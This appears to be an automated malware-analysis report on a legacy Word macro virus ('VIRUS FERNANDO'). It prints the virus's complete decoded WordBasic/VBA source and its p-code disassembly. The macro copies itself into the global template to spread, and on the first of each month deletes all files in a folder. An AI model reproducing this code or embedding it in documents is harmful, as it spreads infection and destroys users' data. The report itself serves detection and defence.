MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro within the AutoopeN subroutine, which is designed to copy itself and save the document in a legacy format. The presence of legacy WordBasic markers and the AutoOpen macro strongly suggest malicious intent, likely to ensure persistence or facilitate further infection. The macro's logic, including the conditional execution based on the day of the month and the attempt to delete files, points towards a downloader or a self-propagating malicious document.
Heuristics 4
-
ClamAV: Doc.Trojan.Minimal-38 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Minimal-38
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3941 bytes |
SHA-256: fd95a4f612c116fa7cc8893b3be5146943dc85324c1bf80d89a3e66235a1c8bc |
|||
|
Detection
ClamAV:
Doc.Trojan.Minimal-38
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoopeN"
Public Sub MAIN()
Dim a$
Dim b$
Dim diálogoEjem As Object
Dim botón
'VIRUS FERNANDO
'HECHO EN EL PERU
On Error Resume Next
a$ = WordBasic.[FileName$]() + ":AutoopeN"
b$ = "Global:AUTOOPEN"
WordBasic.MacroCopy a$, b$
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy b$, a$
If WordBasic.Day(WordBasic.Now()) = 1 Then
WordBasic.Kill "C:\MINE\*.*"
'*******MESAGE BOX****************
WordBasic.BeginDialog 320, 144, "AMOR"
WordBasic.PushButton 110, 93, 97, 21, "OK", "ONE OR TWO"
WordBasic.Text 75, 32, 237, 33, "DOS AMORES EN MI VIDA TU, YO Y EL", "Texto1"
WordBasic.Text 75, 49, 237, 33, "SINO SON DOS....NO HAY AMOR", "Texto2"
WordBasic.EndDialog
'********************************************
Set diálogoEjem = WordBasic.CurValues.UserDialog
WordBasic.DisableInput 1
botón = WordBasic.Dialog.UserDialog(diálogoEjem)
WordBasic.DisableInput 0
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/aead1f9c5d524ac99ddd95c94d5abd63.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoopeN - 2520 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn a
' Line #3:
' Dim
' VarDefn B
' Line #4:
' Dim
' VarDefn diálogoEjem (As Object)
' Line #5:
' Dim
' VarDefn botón
' Line #6:
' QuoteRem 0x0005 0x000E "VIRUS FERNANDO"
' Line #7:
' QuoteRem 0x0005 0x0010 "HECHO EN EL PERU"
' Line #8:
' OnError (Resume Next)
' Line #9:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x0009 ":AutoopeN"
' Add
' St a$
' Line #10:
' LitStr 0x000F "Global:AUTOOPEN"
' St B$
' Line #11:
' Ld a$
' Ld B$
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #12:
' LitDI2 0x0001
' ParamNamed Format$
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #13:
' Ld B$
' Ld a$
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #14:
' Ld WordBasic
' ArgsMemLd Now 0x0000
' Ld WordBasic
' ArgsMemLd Day 0x0001
' LitDI2 0x0001
' Eq
' IfBlock
' Line #15:
' LitStr 0x000B "C:\MINE\*.*"
' Ld WordBasic
' ArgsMemCall Kill 0x0001
' Line #16:
' QuoteRem 0x0000 0x0021 "*******MESAGE BOX****************"
' Line #17:
' LitDI2 0x0140
' LitDI2 0x0090
' LitStr 0x0004 "AMOR"
' Ld WordBasic
' ArgsMemCall BeginDialog 0x0003
' Line #18:
' LitDI2 0x006E
' LitDI2 0x005D
' LitDI2 0x0061
' LitDI2 0x0015
' LitStr 0x0002 "OK"
' LitStr 0x000A "ONE OR TWO"
' Ld WordBasic
' ArgsMemCall PushButton 0x0006
' Line #19:
' LitDI2 0x004B
' LitDI2 0x0020
' LitDI2 0x00ED
' LitDI2 0x0021
' LitStr 0x0021 "DOS AMORES EN MI VIDA TU, YO Y EL"
' LitStr 0x0006 "Texto1"
' Ld WordBasic
' ArgsMemCall Then 0x0006
' Line #20:
' LitDI2 0x004B
' LitDI2 0x0031
' LitDI2 0x00ED
' LitDI2 0x0021
' LitStr 0x001B "SINO SON DOS....NO HAY AMOR"
' LitStr 0x0006 "Texto2"
' Ld WordBasic
' ArgsMemCall Then 0x0006
' Line #21:
' Ld WordBasic
' ArgsMemCall EndDialog 0x0000
' Line #22:
' QuoteRem 0x0000 0x002C "********************************************"
' Line #23:
' SetStmt
' Ld WordBasic
' MemLd CurValues
' MemLd UserDialog
' Set diálogoEjem
' Line #24:
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall DisableInput 0x0001
' Line #25:
' Ld diálogoEjem
' Ld WordBasic
' MemLd Dialog
' ArgsMemLd UserDialog 0x0001
' St botón
' Line #26:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableInput 0x0001
' Line #27:
' EndIfBlock
' Line #28:
' Line #29:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.